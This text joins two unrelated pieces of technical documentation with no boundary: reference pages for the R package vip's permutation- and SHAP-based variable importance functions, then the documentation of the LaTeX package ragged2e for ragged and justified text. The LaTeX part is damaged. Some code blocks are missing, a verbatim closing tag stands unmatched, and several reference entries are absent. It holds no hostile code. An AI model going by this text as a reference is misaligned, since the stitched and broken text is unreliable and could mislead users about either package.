rpart As stated in one of the rpart vignettes: a variable may appear in the tree many times, either as a primary or a surrogate variable. An overall measure of variable importance is the sum of the goodness of split measures for each split for which it was the primary variable, plus "goodness" * (adjusted agreement) for all splits in which it was a surrogate. Imagine two variables which were essentially duplicates of each other; if we did not count surrogates, they would split the importance, with neither showing up as strongly as it should. See rpart for details.
train Various model-specific and model-agnostic approaches that depend on the learning algorithm employed in the original call to train. See varImp for details.
xgboost For linear models, the variable importance is the absolute magnitude of the estimated coefficients. For that reason, in order to obtain a meaningful ranking by importance for a linear model, the features need to be on the same scale (which you also would want to do when using either L1 or L2 regularization). Otherwise, the approach described in Friedman (2001) for gbms is used. See xgb.importance for details. For tree models, you can obtain three different types of variable importance:
- Using type = "gain" (the default) gives the fractional contribution of each feature to the model based on the total gain of the corresponding feature's splits.
- Using type = "cover" gives the number of observations related to each feature.
- Using type = "frequency" gives the percentages representing the relative number of times each feature has been used throughout each tree in the ensemble.
Value
A tidy data frame (i.e., a "tibble" object) with two columns: Variable and Importance. For "lm"/"glm"-like objects, an additional column, called Sign, is also included which gives the sign (i.e., POS/NEG) of the original coefficient.
Note
Inspired by the varImp function.
---
### vi_pdp
**Description**
These functions have been deprecated and should not be used. They will be removed in the next release.
**Usage**
```r
vi_pdp(...)
vi_ice(...)
```
**Arguments**

- `...`: Arguments passed on to `vi_firm`.
---
### vi_permute
**Description**
Compute permutation-based variable importance scores for the predictors in a model.
**Usage**

```r
vi_permute(object, ...)

## Default S3 method:
vi_permute(
  object,
  feature_names = NULL,
  train = NULL,
  target = NULL,
  metric = NULL,
  smaller_is_better = NULL,
  type = c("difference", "ratio"),
  nsim = 1,
  keep = TRUE,
  sample_size = NULL,
  sample_frac = NULL,
  reference_class = NULL,
  pred_fun = NULL,
  pred_wrapper = NULL,
  verbose = FALSE,
  progress = "none",
  parallel = FALSE,
  paropts = NULL,
  ...
)
```
Arguments
object A fitted model object (e.g., a "randomForest" object).
... Additional optional arguments. (Currently ignored.)
feature_names Character string giving the names of the predictor variables (i.e., features) of interest. If NULL (the default) then the internal ‘get_feature_names()’ function will be called to try and extract them automatically. It is good practice to always specify this argument.
train A matrix-like R object (e.g., a data frame or matrix) containing the training data. If NULL (the default) then the internal ‘get_training_data()’ function will be called to try and extract it automatically. It is good practice to always specify this argument.
target Either a character string giving the name (or position) of the target column in train or, if train only contains feature columns, a vector containing the target values used to train object.
metric Either a function or character string specifying the performance metric to use in computing model performance (e.g., RMSE for regression or accuracy for binary classification). If metric is a function, then it requires two arguments, actual and predicted, and should return a single, numeric value. Ideally, this should be the same metric that was used to train object. See list_metrics for a list of built-in metrics.
smaller_is_better Logical indicating whether or not a smaller value of metric is better. Default is NULL. Must be supplied if metric is a user-supplied function.
type Character string specifying how to compare the baseline and permuted performance metrics. Current options are "difference" (the default) and "ratio".
nsim Integer specifying the number of Monte Carlo replications to perform. Default is 1. If nsim > 1, the results from each replication are simply averaged together (the standard deviation will also be returned).
keep Logical indicating whether or not to keep the individual permutation scores for all nsim repetitions. If TRUE (the default) then the individual variable importance scores will be stored in an attribute called "raw_scores". (Only used when nsim > 1.)
**sample_size**
Integer specifying the size of the random sample to use for each Monte Carlo repetition. Default is NULL (i.e., use all of the available training data). Cannot be specified with sample_frac. Can be used to reduce computation time with large data sets.
**sample_frac**
Proportion specifying the size of the random sample to use for each Monte Carlo repetition. Default is NULL (i.e., use all of the available training data). Cannot be specified with sample_size. Can be used to reduce computation time with large data sets.
**reference_class**
Character string specifying which response category represents the "reference" class (i.e., the class for which the predicted class probabilities correspond to). Only needed for binary classification problems.
**pred_fun**
Deprecated. Use pred_wrapper instead.
**pred_wrapper**
Prediction function that requires two arguments, object and newdata. The output of this function should be determined by the metric being used:
- **Regression** A numeric vector of predicted outcomes.
- **Binary classification** A vector of predicted class labels (e.g., if using misclassification error) or a vector of predicted class probabilities for the reference class (e.g., if using log loss or AUC).
- **Multiclass classification** A vector of predicted class labels (e.g., if using misclassification error) or a matrix/data frame of predicted class probabilities for each class (e.g., if using log loss or AUC).
**verbose**
Logical indicating whether or not to print information during the construction of variable importance scores. Default is FALSE.
**progress**
Character string giving the name of the progress bar to use. See `create_progress_bar` for details. Default is "none".
**parallel**
Logical indicating whether or not to run `vi_permute()` in parallel (using a backend provided by the foreach package). Default is FALSE. If TRUE, an appropriate backend must be provided by foreach.
**paropts**
List containing additional options to be passed on to foreach when parallel = TRUE.
**Details**
Coming soon!
**Value**
A tidy data frame (i.e., a "tibble" object) with two columns: Variable and Importance.
**Examples**

```r
## Not run:
# Load required packages
library(ggplot2)    # for ggtitle() function
library(gridExtra)  # for grid.arrange() function
library(nnet)       # for fitting neural networks

# Simulate training data
trn <- gen_friedman(500, seed = 101)  # ?vip::gen_friedman

# Inspect data
tibble::as_tibble(trn)

# Fit PPR and NN models (hyperparameters were chosen using the caret package
# with 5 repeats of 5-fold cross-validation)
pp <- ppr(y ~ ., data = trn, nterms = 11)
set.seed(0803)  # for reproducibility
nn <- nnet(y ~ ., data = trn, size = 7, decay = 0.1, linout = TRUE,
           maxit = 500)

# Plot VI scores
set.seed(2021)  # for reproducibility
p1 <- vip(pp, method = "permute", target = "y", metric = "rsquared",
          pred_wrapper = predict) + ggtitle("PPR")
p2 <- vip(nn, method = "permute", target = "y", metric = "rsquared",
          pred_wrapper = predict) + ggtitle("NN")
grid.arrange(p1, p2, ncol = 2)

# Mean absolute error
mae <- function(actual, predicted) {
  mean(abs(actual - predicted))
}

# Permutation-based VIP with user-defined MAE metric
set.seed(1101)  # for reproducibility
vip(pp, method = "permute", target = "y", metric = mae,
    smaller_is_better = TRUE,
    pred_wrapper = function(object, newdata) predict(object, newdata)
) + ggtitle("PPR")

## End(Not run)
```
---
### vi_shap

**SHAP-based variable importance**
**Description**
Compute SHAP-based VI scores for the predictors in a model. See details below.
**Usage**
```r
vi_shap(object, ...)

## Default S3 method:
vi_shap(object, feature_names = NULL, train = NULL, ...)
```
Arguments
- **object**: A fitted model object (e.g., a "randomForest" object).
- **...**: Additional optional arguments to be passed on to `explain`.
- **feature_names**: Character string giving the names of the predictor variables (i.e., features) of interest. If NULL (the default) then the internal `get_feature_names()` function will be called to try and extract them automatically. It is good practice to always specify this argument.
- **train**: A matrix-like R object (e.g., a data frame or matrix) containing the training data. If NULL (the default) then the internal `get_training_data()` function will be called to try and extract it automatically. It is good practice to always specify this argument.
Details
This approach to computing VI scores is based on the mean absolute value of the SHAP values for each feature; see, for example, [https://github.com/slundberg/shap](https://github.com/slundberg/shap) and the references therein.
Value
A tidy data frame (i.e., a "tibble" object) with two columns, `Variable` and `Importance`, containing the variable name and its associated importance score, respectively.
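A minimal sketch of a call (assumes the vip and fastshap packages are installed; extra arguments such as `pred_wrapper` and `nsim` are passed on to `explain` via `...`):

```r
library(vip)

# Fit a simple projection pursuit regression to the built-in mtcars data
fit <- ppr(mpg ~ ., data = mtcars, nterms = 2)

# Mean |SHAP value| per feature; a prediction wrapper is required for
# models without a fastshap-supported predict method
vi_shap(fit, train = subset(mtcars, select = -mpg), nsim = 10,
        pred_wrapper = function(object, newdata) predict(object, newdata))
```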
The \texttt{ragged2e}-package\footnote{The version number of this file is v3.1, revision #(None), last revised (None).}
Martin Schröder
\url{https://gitlab.com/TeXhackse/ragged2e}\footnote{maintained by Marei Peischl}
2021/12/15
Abstract
This package provides new commands and environments for setting ragged text which are easy to configure to allow hyphenation. An earlier attempt to do this was the style \texttt{raggedright} \cite{raggedright} by the same author.
Contents
1 The problem
2 Old “solutions”
   2.1 \LaTeX
   2.2 plain
3 Our solution
   3.1 The macros
   3.2 The parameters
   3.3 The environments
4 Options
5 Required packages
6 The implementation
   6.1 Initial Code
   6.2 Declaration of options
      6.2.1 originalcommands option
      6.2.2 originalparameters option
      6.2.3 raggedrightboxes option
      6.2.4 footnotes option
      6.2.5 document option
      6.2.6 Other options
   6.3 Executing options
   6.4 Loading packages
   6.5 Allocations
   6.6 Initializations
   6.7 Distinguishing between monospaced and proportional fonts
   6.8 The commands
1 The problem
LaTeX has three commands (\centering, \raggedleft, and \raggedright) and three environments (center, flushleft, and flushright) to typeset ragged text. The environments are based upon the commands (center uses \centering, flushleft \raggedright, and flushright \raggedleft).
These commands have, however, one serious flaw: they render hyphenation almost impossible, and thus the text looks too ragged, as the following example shows:
\raggedright:
"The LaTeX document preparation system is a special version of Donald Knuth’s \TeX program. \TeX is a sophisticated program designed to produce high-quality typesetting, especially for mathematical text." [5, p. xiii]
\raggedleft:
"The \TeX document preparation system is a special version of Donald Knuth’s \TeX program. \TeX is a sophisticated program designed to produce high-quality typesetting, especially for mathematical text." [5, p. xiii]
2 Old “solutions”
2.1 \LaTeX
\LaTeX{} defines e.g. \raggedright as follows:

\begin{verbatim}
\DeclareRobustCommand\raggedright{%
  \let\\\@centercr
  \rightskip\@flushglue
  \finalhyphendemerits=\z@
  \leftskip\z@skip
  \parindent\z@}
\end{verbatim}

Initially, \@flushglue is defined as

\begin{verbatim}
\@flushglue = 0pt plus 1fil
\end{verbatim}

Thus the \rightskip is set to 0pt plus 1fil. Knuth, however, warns [4, p. 101]:
“For example, a person can set \rightskip=0pt plus 1fil, and every line will be filled with space to the right. But this isn’t a particularly good way to make ragged-right margins, because the infinite stretchability will assign zero badness to lines that are very short. To do a decent job of ragged-right setting, the trick is to set \rightskip so that it will stretch enough to make line breaks possible, yet not too much, because short lines should be considered bad. Furthermore the spaces between words should be fixed so that they do not stretch or shrink.”
2.2 \texttt{plain}

\texttt{plain} \TeX{} defines a special version of \raggedright, which operates the way Knuth describes it, but which cannot be used with \LaTeX{}, because \LaTeX{} redefines \raggedright:
\begin{verbatim}
\def\raggedright{%
  \rightskip\z@ plus2em
  \spaceskip.3333em
  \xspaceskip.5em\relax}
\end{verbatim}
\textit{plain} also provides a version of \raggedright for typewriter fonts:

\begin{verbatim}
\def\ttraggedright{%
  \tt
  \rightskip\z@ plus2em\relax}
\end{verbatim}
3 Our solution
Since the \textit{plain} solution cannot be used with \LaTeX{}, we have to redefine it and make it possible to configure it for personal preferences.
3.1 The macros
\texttt{\Centering}, \texttt{\RaggedLeft}, and \texttt{\RaggedRight} can be used in the same way as \texttt{\centering}, \texttt{\raggedleft}, and \texttt{\raggedright}: Just type the command, and after that the whole text will be set centered, ragged-left or ragged-right.
For example, we switched on \texttt{\RaggedRight} on the top of this text, and consequently this text was set ragged-right.\textsuperscript{*}
\texttt{\justifying} switches back to justified text after ragged text has been switched on.
The new commands \texttt{\Centering}, \texttt{\RaggedLeft}, and \texttt{\RaggedRight} are fully compatible with their counterparts in \LaTeX, but implement the \textit{plain} solution and can be easily configured using the following parameters:
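As a minimal usage sketch of these commands:

```latex
\documentclass{article}
\usepackage{ragged2e}
\begin{document}
\RaggedRight
This paragraph is set ragged-right, but hyphenation is still possible.

\justifying
This paragraph is justified again.
\end{document}
```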
3.2 The parameters
\begin{tabular}{ll}
\hline
Command & Uses \\
\hline
\texttt{\Centering} & \texttt{\CenteringLeftskip}, \texttt{\CenteringRightskip}, \texttt{\CenteringParfillskip}, \texttt{\CenteringParindent} \\
\texttt{\RaggedLeft} & \texttt{\RaggedLeftLeftskip}, \texttt{\RaggedLeftRightskip}, \texttt{\RaggedLeftParfillskip}, \texttt{\RaggedLeftParindent} \\
\texttt{\RaggedRight} & \texttt{\RaggedRightLeftskip}, \texttt{\RaggedRightRightskip}, \texttt{\RaggedRightParfillskip}, \texttt{\RaggedRightParindent} \\
\texttt{\justifying} & \texttt{\justifyingParfillskip}, \texttt{\justifyingParindent} \\
\hline
\end{tabular}
All Parameters can be set with \texttt{\setlength}, e.g.
\begin{verbatim}
\setlength{\RaggedRightRightskip}{0pt plus 1em}
\end{verbatim}
\textsuperscript{*}For this documentation we also set \texttt{\RaggedRightRightskip} higher than usual (\texttt{0pt plus 3em} instead of \texttt{0pt plus 2em}) because of all the long command names, which make line breaking difficult.
sets \RaggedRightRightskip to \texttt{0pt plus 1em}.
These are the \leftskip inserted by \Centering, \RaggedLeft, and \RaggedRight.
\textit{“leftskip (glue at left of justified lines)” [4, p. 274]}
\leftskip must be set to a finite value, to make hyphenation possible. Setting it to infinite values like \texttt{0pt plus 1fil} makes hyphenation almost impossible.
These are the \rightskip inserted by \Centering, \RaggedLeft, and \RaggedRight.
\textit{“rightskip (glue at right of justified lines)” [4, p. 274]}
\rightskip must be set to a finite value, to make hyphenation possible. Setting it to infinite values like \texttt{0pt plus 1fil} makes hyphenation almost impossible.
These are the \parfillskip inserted by \Centering, \RaggedLeft, \RaggedRight, and \justifying.
\textit{“parfillskip (additional \rightskip at end of paragraphs)” [4, p. 274]}
The normal setting for \parfillskip is \texttt{0pt plus 1fil}; the parameters are provided for testing combinations of \leftskip/\rightskip and \parfillskip.
These are the \parindent used by \Centering, \RaggedLeft, \RaggedRight, and \justifying.
\textit{“parindent (width of indent)” [4, p. 274]}
\parindent is the indent of the first line of a paragraph and should be set to \texttt{0pt}, since indented lines in ragged text do not look good.
The parameters have the following initial setting:
3.3 The environments
Center Center is fully compatible with center, but uses \Centering instead of \centering.
FlushLeft FlushLeft is fully compatible with flushleft, but uses \RaggedRight instead of \raggedright.
FlushRight FlushRight is fully compatible with flushright, but uses \RaggedLeft instead of \raggedleft.
justify justify is like the other environments but uses \justifying.
E. g. FlushLeft can be used in the same way as flushleft:
\begin{FlushLeft}
⟨text, which is set ragged-right⟩
\end{FlushLeft}
4 Options
This package has the following options:
originalcommands The \LaTeX-commands \centering, \raggedleft, and \raggedright and the \LaTeX-environments center, flushleft, and flushright remain unchanged.
It is the default.
\footnote{†For proportional and monospaced fonts.}
newcommands The \LaTeX-commands \texttt{\centering}, \texttt{\raggedleft}, and \texttt{\raggedright} and the \LaTeX-environments \texttt{center}, \texttt{flushleft}, and \texttt{flushright} are set equal to their counterparts defined by \texttt{ragged2e}. Thus \texttt{\raggedright} invokes \texttt{\RaggedRight}. The original commands can be accessed under the names \texttt{\LaTeX\langle\text{original name}\rangle}, e.g. \texttt{\LaTeX\raggedright}.
originalparameters The parameters used by the commands implemented by \texttt{ragged2e} are initialized with the default settings used by \LaTeX.
newparameters The parameters used by the commands implemented by \texttt{ragged2e} are initialized with the default settings defined by \texttt{ragged2e}. It is the default.
raggedrightboxes All \texttt{\parbox}es, \texttt{minipage}s, \texttt{\marginpar}s and \texttt{p}-columns of \texttt{tabular}s and \texttt{array}s are automatically set using \texttt{\RaggedRight}.
footnotes This options sets all footnotes ragged-right by loading the \texttt{footmisc}[2] package with the \texttt{ragged} option.
document This options sets the complete document ragged-right by executing a \texttt{\RaggedRight} at \texttt{\begin{document}} and the \texttt{raggedrightboxes} and the \texttt{footnotes} options.
All other options are passed to the \texttt{footmisc} package if the \texttt{footnotes} option is selected.
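For example, a document that wants the new implementations under the classic names, plus ragged footnotes, would load the package as:

```latex
% newcommands: \raggedright etc. now invoke \RaggedRight etc.
% footnotes:   loads footmisc with its ragged option
\usepackage[newcommands,footnotes]{ragged2e}
```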
5 Required packages
This package requires the following packages:
everysel [8] (only if format older than 2021/01/05) It has been used to distinguish between monospaced and proportional fonts as long as the \LaTeX{} kernel did not provide the functionality with \texttt{lthooks} [6]. Formats newer than 2021/01/05 no longer depend on \texttt{everysel}.
footmisc[2] It is used by the \texttt{footnotes} and the \texttt{document} options; at least version 5.00 (2002/08/28) is needed.
6 The implementation
6.1 Initial Code
\if@raggedtwoe@originalcommands is used to flag the use of the \texttt{originalcommands} or \texttt{newcommands} option.
\if@raggedtwoe@originalparameters is used to flag the use of the originalparameters or newparameters option.

\begin{verbatim}
\newif\if@raggedtwoe@originalparameters
\end{verbatim}

\if@raggedtwoe@footmisc is used to flag the use of the footnotes option.

\begin{verbatim}
\newif\if@raggedtwoe@footmisc
\end{verbatim}
6.2 Declaration of options
6.2.1 originalcommands option
The originalcommands and newcommands options control the meaning of the \LaTeX-commands for ragged text: if newcommands is used, the \LaTeX-commands are set equal to the commands defined by \texttt{ragged2e}.

\begin{verbatim}
\DeclareOption{OriginalCommands}{\@raggedtwoe@originalcommandstrue}
\DeclareOption{originalcommands}{\@raggedtwoe@originalcommandstrue}
\DeclareOption{NewCommands}{\@raggedtwoe@originalcommandsfalse}
\DeclareOption{newcommands}{\@raggedtwoe@originalcommandsfalse}
\end{verbatim}
6.2.2 originalparameters option
The originalparameters and newparameters options control the defaults for the parameters used by the commands implemented by \texttt{ragged2e}: if newparameters is used, the parameters are set to the values defined by \texttt{ragged2e}.

\begin{verbatim}
\DeclareOption{OriginalParameters}{\@raggedtwoe@originalparameterstrue}
\DeclareOption{originalparameters}{\@raggedtwoe@originalparameterstrue}
\DeclareOption{NewParameters}{\@raggedtwoe@originalparametersfalse}
\DeclareOption{newparameters}{\@raggedtwoe@originalparametersfalse}
\end{verbatim}
6.2.3 raggedrightboxes option
The option raggedrightboxes sets all \parboxes, minipages, \marginpars and p-columns of tabulars and arrays using \RaggedRight. This is done by redefining \arrayparboxrestore.
\@raggedtwoe@raggedrightboxes@opt is the code executed via \DeclareOption.

\begin{verbatim}
\newcommand*{\@raggedtwoe@raggedrightboxes@opt}{}
\end{verbatim}
First we check that \@arrayparboxrestore is unchanged.

\begin{verbatim}
\CheckCommand*{\@arrayparboxrestore}{%
  \let\if@nobreak\iffalse
  \let\if@noskipsec\iffalse
  \let\par\@@par
  \let\-\@dischyph
  \let\'\@acci\let\`\@accii\let\=\@acciii}
\end{verbatim}
Then we redefine it by removing the setting of `\leftskip`, `\rightskip`, \@rightskip and `\parfillskip` and instead calling `\RaggedRight`.
Now we self-destroy so the command can be called more than once without causing harm (and it also frees up some space).
Finally the declaration of the option.
6.2.4 `footnotes` option
The option `footnotes` just sets a flag (`\if@raggedtwoe@footmisc`) to load the `footmisc` package and passes the option `ragged` to it.
6.2.5 `document` option
The option `document` sets the complete document ragged-right by executing `\RaggedRight` via `\AtBeginDocument` and also executing the `raggedrightboxes` option.
\@raggedtwoe@abdhook is the code executed via \AtBeginDocument: give a message on the terminal, execute \RaggedRight, and self-destroy. We also make \@tocrmarg flexible; otherwise long lines in the table of contents (and similar tables) would not be broken, because the spaceskip is rigid.

\begin{verbatim}
\newcommand{\@raggedtwoe@abdhook}{%
  \PackageInfo{ragged2e}{ABD: executing \string\RaggedRight}%
  \RaggedRight
  \@ifundefined{@tocrmarg}{}{\edef\@tocrmarg{\@tocrmarg plus 2em}}%
  \let\@raggedtwoe@abdhook\relax}
\end{verbatim}
Finally the declaration of the option.
\DeclareOption{document}{\@raggedtwoe@document@opt}
6.2.6 Other options
All unused options are passed to the footmisc package if the footnotes option is selected; otherwise the usual error is raised.

\begin{verbatim}
\DeclareOption*{%
  \if@raggedtwoe@footmisc
    \PassOptionsToPackage{\CurrentOption}{footmisc}%
  \else
    \OptionNotUsed
  \fi}
\end{verbatim}
6.3 Executing options
The default options are originalcommands and newparameters.

\begin{verbatim}
\ExecuteOptions{originalcommands,newparameters}
\ProcessOptions\relax
\end{verbatim}
6.4 Loading packages
We need the everysel package for older kernels.
If the option footnotes is selected, we load the footmisc package after we are finished (footmisc detects our presence by looking for the definition of \RaggedRight, so we can not load it just now).
6.5 Allocations
First we allocate the parameters
\newlength{\CenteringLeftskip}
\newlength{\RaggedLeftLeftskip}
\newlength{\RaggedRightLeftskip}
\newlength{\CenteringRightskip}
\newlength{\RaggedLeftRightskip}
\newlength{\RaggedRightRightskip}
\newlength{\CenteringParfillskip}
\newlength{\RaggedLeftParfillskip}
\newlength{\RaggedRightParfillskip}
\newlength{\JustifyingParfillskip}
\newlength{\CenteringParindent}
\newlength{\RaggedLeftParindent}
\newlength{\RaggedRightParindent}
\newlength{\JustifyingParindent}
6.6 Initializations
Depending on \if@raggedtwoe@originalparameters we initialize the parameters with the values \LaTeX{} uses for its own commands or with our new parameters.
\if@raggedtwoe@originalparameters
\CenteringLeftskip\@flushglue
\RaggedLeftLeftskip\@flushglue
\RaggedRightLeftskip\z@skip
\CenteringRightskip\@flushglue
\RaggedLeftRightskip\z@skip
\RaggedRightRightskip\@flushglue
\CenteringParfillskip\z@skip
\RaggedLeftParfillskip\z@skip
\RaggedRightParfillskip\@flushglue
\CenteringParindent\z@
\RaggedLeftParindent\z@
\RaggedRightParindent\z@
\else
\CenteringLeftskip\z@\@plus\tw@ em
\RaggedLeftLeftskip\z@\@plus\tw@ em
\RaggedRightLeftskip\z@skip
\CenteringRightskip\z@\@plus\tw@ em
\RaggedLeftRightskip\z@skip
\RaggedRightRightskip\z@\@plus\tw@ em
\fi
6.7 Distinguishing between monospaced and proportional fonts
To set ragged text with proportional and monospaced fonts correctly, we must distinguish between these two kinds of fonts \textit{every time} a font is loaded. Otherwise the settings for, e.g., a proportional font would still be in effect if you start \texttt{\RaggedRight} in \texttt{\rmfamily} and then switch to \texttt{\ttfamily}.
The goal is to have a rigid interword space in all fonts. TeX’s interword space is \texttt{\fontdimen2 plus \fontdimen3 minus \fontdimen4}. This can be overwritten by setting \texttt{\spaceskip} (space between words, if nonzero) and \texttt{\xspaceskip} (space at the end of sentences, if nonzero).
We do the setting with the help of \texttt{everysel} [8], which allows us to define code which is (hopefully) executed after every font change in a LaTeX document.‡
\if@raggedtwoe@spaceskip signals the use of commands defined by ragged2e to the code inserted into \texttt{\selectfont}. It is set to true by these commands and restored to false by \TeX{} when their scope ends.
\begin{verbatim}
\newif\if@raggedtwoe@spaceskip
\end{verbatim}
\@raggedtwoe@everyselectfont is our code inserted into \texttt{\selectfont}. If a command defined by ragged2e is in use, we look at \texttt{\fontdimen3} to see whether the current font is monospaced. If it is, we set \texttt{\spaceskip} to 0pt, so the interword space is the one specified by the font designer -- which is rigid anyway for monospaced fonts. For proportional fonts we make the interword space rigid by setting \texttt{\spaceskip} to \texttt{\fontdimen2}. If no command defined by ragged2e is active, we have to reset the interword space.
\begin{verbatim}
\newcommand{\@raggedtwoe@everyselectfont}{%
  \if@raggedtwoe@spaceskip
    \ifdim\fontdimen3\font=\z@\relax
      \spaceskip\z@
    \else
      \spaceskip\fontdimen2\font
    \fi
  \else
    \spaceskip\z@
  \fi
}
\end{verbatim}
If our kernel is new enough, we use the kernel hook directly instead of the \texttt{\EverySelectfont} macro:
\begin{verbatim}
\IfFormatAtLeastTF{2021/01/05}
  {\AddToHook{selectfont}{\@raggedtwoe@everyselectfont}}
  {\EverySelectfont{\@raggedtwoe@everyselectfont}}
\end{verbatim}
‡It is executed after every \texttt{\selectfont}, so if you stay within NFSS and don’t declare your fonts with commands like \texttt{\newfont} and then switch to them, it will work.
6.8 The commands
\@raggedtwoe@savedcr We save the definition of \\ in \@raggedtwoe@savedcr.
\begin{verbatim}
\let\@raggedtwoe@savedcr\\
\end{verbatim}
\@raggedtwoe@saved@gnewline We save the definition of \@gnewline in \@raggedtwoe@saved@gnewline.
\begin{verbatim}
\let\@raggedtwoe@saved@gnewline\@gnewline
\end{verbatim}
The following definition of a \@gnewline used by the ragged commands was suggested by Markus Kohm:
\begin{verbatim}
\newcommand*{\@raggedtwoe@gnewline}[1]{%
  \ifvmode
    \@nolnerr
  \else
    \unskip
    \ifmmode
      \reserved@e{\reserved@f#1}\nobreak\hfil\break
    \else
      \reserved@e{\reserved@f#1}{\parskip\z@\par}%
    \fi
  \fi
}
\end{verbatim}
\Centering first lets \\ = \@centercr, but only if \\ has its original meaning; otherwise \Centering would not work inside environments like \texttt{tabular} etc., in which \\ has a different meaning. It also sets \@gnewline to \@raggedtwoe@gnewline. Then the \LaTeX{} and \TeX{} parameters are set. \@rightskip is \LaTeX's version of \rightskip.
“Every environment, like the list environments, that set \rightskip to its ‘normal’ value set it to \@rightskip” [1]
Finally we signal the code inserted into \selectfont that we are active and call that code directly.
\begin{verbatim}
\DeclareRobustCommand{\Centering}{%
\ifx\\\@raggedtwoe@savedcr
\let\\\@centercr
\fi
\let\@gnewline\@raggedtwoe@gnewline
\leftskip\CenteringLeftskip
\@rightskip\CenteringRightskip
\rightskip\@rightskip
\parfillskip\CenteringParfillskip
\parindent\CenteringParindent
\@raggedtwoe@spaceskiptrue
\@raggedtwoe@everyselectfont
}
\RaggedLeft
\RaggedLeft is like \Centering; it only uses other parameters.
\DeclareRobustCommand{\RaggedLeft}{%
\ifx\\\@raggedtwoe@savedcr
\let\\\@centercr
\fi
\let\@gnewline\@raggedtwoe@gnewline
\leftskip\RaggedLeftLeftskip
\@rightskip\RaggedLeftRightskip
\rightskip\@rightskip
\parfillskip\RaggedLeftParfillskip
\parindent\RaggedLeftParindent
\@raggedtwoe@spaceskiptrue
\@raggedtwoe@everyselectfont
}
\RaggedRight
\RaggedRight is like \Centering; it only uses other parameters.
\DeclareRobustCommand{\RaggedRight}{%
\ifx\\\@raggedtwoe@savedcr
\let\\\@centercr
\fi
\let\@gnewline\@raggedtwoe@gnewline
\leftskip\RaggedRightLeftskip
\@rightskip\RaggedRightRightskip
\rightskip\@rightskip
\parfillskip\RaggedRightParfillskip
\parindent\RaggedRightParindent
\@raggedtwoe@spaceskiptrue
\@raggedtwoe@everyselectfont
}
\justifying
\justifying switches back to the defaults used by \LaTeX\ for typesetting justified text.
\end{verbatim}
6.9 The environments
The environments Center, FlushLeft, and FlushRight are implemented like their counterparts in \LaTeX: Start a trivlist and switch on the right command.
\begin{verbatim}
\newenvironment{Center}{%
  \trivlist
  \Centering\item\relax
}{\endtrivlist}
\newenvironment{FlushLeft}{%
  \trivlist
  \RaggedRight\item\relax
}{\endtrivlist}
\newenvironment{FlushRight}{%
  \trivlist
  \RaggedLeft\item\relax
}{\endtrivlist}
\end{verbatim}
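A minimal usage sketch of these environments (document body only; assumes the package is loaded):

```latex
\begin{FlushLeft}
  This text is set ragged right (flush left), with hyphenation kept
  and a little stretchability instead of fully rigid raggedness.
\end{FlushLeft}
\begin{Center}
  A centered block.
\end{Center}
\begin{FlushRight}
  And a flush-right block.
\end{FlushRight}
```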
justify is similar to the other environments: Start a trivlist and use \justifying.
\begin{verbatim}
\newenvironment{justify}{%
  \trivlist
  \justifying\item\relax
}{\endtrivlist}
\end{verbatim}
6.10 Overloading the \LaTeX-commands
If the option newcommands is used, we save the original \LaTeX-commands and environments for ragged text and overload them.
\begin{verbatim}
\if@raggedtwoe@originalcommands
\end{verbatim}
7 Acknowledgements
A first version of this package for \LaTeX2.09 was named raggedri [9]. Laurent Siebenmann (lcs@topo.math.u-psud.fr) with his style ragged.sty [10] provided the final impulse for this new implementation.
The code for justifying, justify and the overloading of \@arrayparboxrestore is incorporated from the raggedr [3] package by James Kilfiger (mapdn@csv.warwick.ac.uk).
Without the constant nagging of Rainer Sieger (rsieger@awi-bremerhaven.de) this package might not be.
Markus Kohm (markus.kohm@gmx.de) provided the code for \@gnewline.
Frank Mittelbach (frank.mittelbach@latex-project.org) provided the impetus for version 2.00.
Rolf Niepraschk (Rolf.Niepraschk@gmx.de) and Hubert Gäßlein found many bugs and provided fixes for them and code for new features.
Jordan Firth (jafirth@ncsu.edu) provided the final push for version 2.2.
References
(2) Robin Fairbairns. *footmisc* — a portmanteau package for customising footnotes in \LaTeX. \url{https://mirror.ctan.org/macros/latex/contrib/footmisc/}.
(3) James Kilfiger. \url{https://ctan.org/tex-archive/obsolete/macros/latex/contrib/raggedr.sty}. \LaTeX\ package.
(6) Frank Mittelbach. The \texttt{lthooks} package. \url{http://mirrors.ctan.org/macros/latex/base/lthooks-doc.pdf}
(7) Frank Mittelbach and Rainer Schöpf. The file \texttt{cmfonts.fdd} for use with \LaTeX. Part of the \LaTeX-distribution.
(8) Martin Schröder. The obsolete \texttt{everysel}-package. \url{http://mirrors.ctan.org/macros/latex/contrib/everysel/everysel.pdf}. \LaTeX\ package.
(9) Martin Schröder. The \texttt{raggedri} document option. Was in \url{http://mirrors.ctan.org/tex-archive/macros/latex209/contrib/raggedright}. \LaTeX2.09 style, outdated.
(10) Laurent Siebenmann. \texttt{ragged.sty}. \texttt{CTAN:tex-archive/macros/generic/ragged.sty}. generic macro file for \texttt{plain} and \texttt{\LaTeX}.
Index
Numbers written in italic refer to the page where the corresponding entry is described; numbers underlined refer to the code line of the definition; numbers in roman refer to the code lines where the entry is used.
Symbols
\^, \-, \=, \@par, \@acci, \@accii, \@acciii, \@arrayparboxrestore, \@centercr, \@dischyph, \@flushglue, \@gnewline, \@ifundefined
J
justify (environment) .......... 5, 239
\justifying ............. 3, 210, 241
\JustifyingParfillskip ............. 4, 99, 140, 216
\JustifyingParindent 4, 99, 141, 217
L
\LaTeXcenter ............ 253
\LaTeXcentering ........... 247
\LaTeXflushleft ........... 255
\LaTeXflushright ......... 257
\LaTeXraggedleft .......... 248
\LaTeXraggedright ........ 249
\leftskip ............. 8, 44, 178, 189, 202, 213
\let .................. 4, 35, 36, 37, 38, 39, 51, 52, 53, 54, 55, 65, 76, 82, 157, 158, 173, 175, 186, 188, 199, 201, 211, 212, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264
\lineskip ................ 46, 61
\lineskiplimit ............. 47, 63
\linewidth ............ 42, 58
N
\newcommand .......... 33, 72, 78, 143, 159
\newenvironment .... 221, 227, 233, 239
\newif .................. 22, 23, 24, 142
\newlength ............ 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112
\nobreak ............ 165
\normalbaselineskip .... 48, 62
\normallineskip ......... 46, 61
\normallineskiplimit .... 47, 63
O
\OptionNotUsed ............ 89
P
\PackageInfo ............. 73
\par ............. 37, 53, 167
\parfillskip ....... 45, 179, 192, 205, 216
\parindent .............. 9, 40, 141, 180, 193, 206, 217
\parskip ................ 40, 56, 167
\PassOptionsToPackage .... 70, 87
\ProcessOptions .......... 93
\providecommand .......... 94
R
\RaggedLeft ............ 3, 184, 235, 251
\raggedleft ............ 248, 251
